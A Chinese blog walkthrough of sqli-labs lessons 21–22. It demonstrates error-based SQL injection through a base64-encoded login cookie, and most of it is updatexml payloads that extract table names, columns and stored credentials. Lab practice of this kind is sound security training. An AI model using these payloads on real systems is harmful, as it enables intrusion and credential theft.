sqli-labs

less-21

这里可以看出来这是个cookie的base64的编码单引号的注入

打开靶场

这里先进行一个万能密码看看

显示登录错误

这里怎么尝试都无法登录

看了下源码

SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1

这里是没有waf的

反正我没有找到waf

这里也去看了下它对我输入的数据的处理

也是看见了

这里要注意一个函数

是在老版本php里才有的

在php版本7.0之后的都废除了

这里了解一下mysql_real_escape_string

它会将我们输入的值中的字符进行转义让他变成一个单纯的字符串

比如我们输入admin'#

实际上是admin\'#所有'不能闭合

只能当作一个字符串来处理

还会转义" \这些字符

这里有一个思路就是直接进行爆破

这里就不再演示了

之前有的用户名和密码是Dumb Dumb

实际上还有admin admin

INSERT INTO security.users (id, username, password) VALUES ('1', 'Dumb', 'Dumb'), ('2', 'Angelina', 'I-kill-you'), ('3', 'Dummy', 'p@ssword'), ('4', 'secure', 'crappy'), ('5', 'stupid', 'stupidity'), ('6', 'superman', 'genious'), ('7', 'batman', 'mob!le'), ('8', 'admin', 'admin');

在sql源文件里面可以看见这个插入语句

这就是里面的表

这里这些都可以用来登录

我就用admin来登录一下

这里可以看见我们的cookie被显示出来

还进行了base64编码

我们输入的用户名就是在cookie这

这里还是解码看一下

这里也是直接开始注入了

admin'
YWRtaW4n

还有一个)

这里需要使用报错注入

直接开始

admin')and updatexml(1,concat(0x7e,database()),2)#
YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSwyKSM=

admin')and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),2)#
YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpKSwyKSM=

admin')and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)#
YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpKSwyKSM=

使用mid往后看看

admin')and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),30)),2)#
YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxtaWQoKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnKSwzMCkpLDIpIw==

admin')and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users)),2)#
YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycykpLDIpIw==

less-22

应该没啥差别

打开环境

直接登录

admin"
YWRtaW4i

走流程

admin"and updatexml(1,concat(0x7e,database()),2)#
YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpLDIpIw==

admin"and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),2)#
YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JykpLDIpIw==

admin"and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)#
YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJykpLDIpIw==

admin"and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),30)),2)#
YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLG1pZCgoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpLDMwKSksMikj

admin')and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users)),2)#
YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLHBhc3N3b3JkKSBmcm9tIHNlY3VyaXR5LnVzZXJzKSksMikj

posted @ 2025-05-08 21:43  crook666  阅读(85)  评论(0)    收藏  举报